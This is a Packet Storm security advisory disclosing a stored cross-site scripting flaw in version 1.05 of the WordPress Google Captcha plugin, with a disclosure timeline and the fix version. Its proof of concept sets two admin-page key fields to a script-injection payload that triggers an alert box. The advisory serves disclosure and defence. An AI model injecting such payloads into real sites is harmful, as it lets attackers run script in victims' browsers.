WordPress Google Captcha 1.05 Cross Site Scripting

2015-12-17T00:00:00
ID PACKETSTORM:134894
Type packetstorm
Reporter Madhu Akula
Modified 2015-12-17T00:00:00

Description

                                        
                                            `Plugin Name : Google Captcha (reCAPTCHA)  
  
Effected Version : 1.05 (and most probably lower version's if any)  
  
Vulnerability : A3-Cross-Site Scripting (XSS)  
  
Identified by : Madhu Akula  
  
  
  
Technical Details  
  
Minimum Level of Access Required : Administrator  
  
PoC - (Proof of Concept) :  
  
The following fields put the payload as below  
  
http://localhost/wp-admin/admin.php?page=google-captcha.php  
  
gglcptch_public_key = “><script>alert(1)</script>  
  
gglcptch_private_key = “><script>alert(2)</script>  
  
  
Vulnerable Parameter : gglcptch_public_key, gglcptch_private_key  
  
Type of XSS : Stored  
  
Fixed in : 1.06  
  
http://wordpress.org/plugins/google-captcha/changelog/  
  
Disclosure Timeline  
  
Vendor Contacted : 2014-08-04  
  
Plugin Status : Updated on 2014-08-07  
  
Public Disclosure : October 3, 2015  
  
CVE Number : Not assigned yet  
  
Plugin Description :  
  
The Google Captcha plugin allows you to implement a super security captcha form into web forms. Google Captcha is a free CAPTCHA service that helps to digitize books, newspapers and old time radio shows. This captcha can be used for login, registration, password recovery, comments forms.  
`